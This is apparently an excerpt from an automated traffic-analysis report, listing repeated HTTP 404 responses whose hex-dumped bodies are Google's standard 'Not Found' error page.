                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 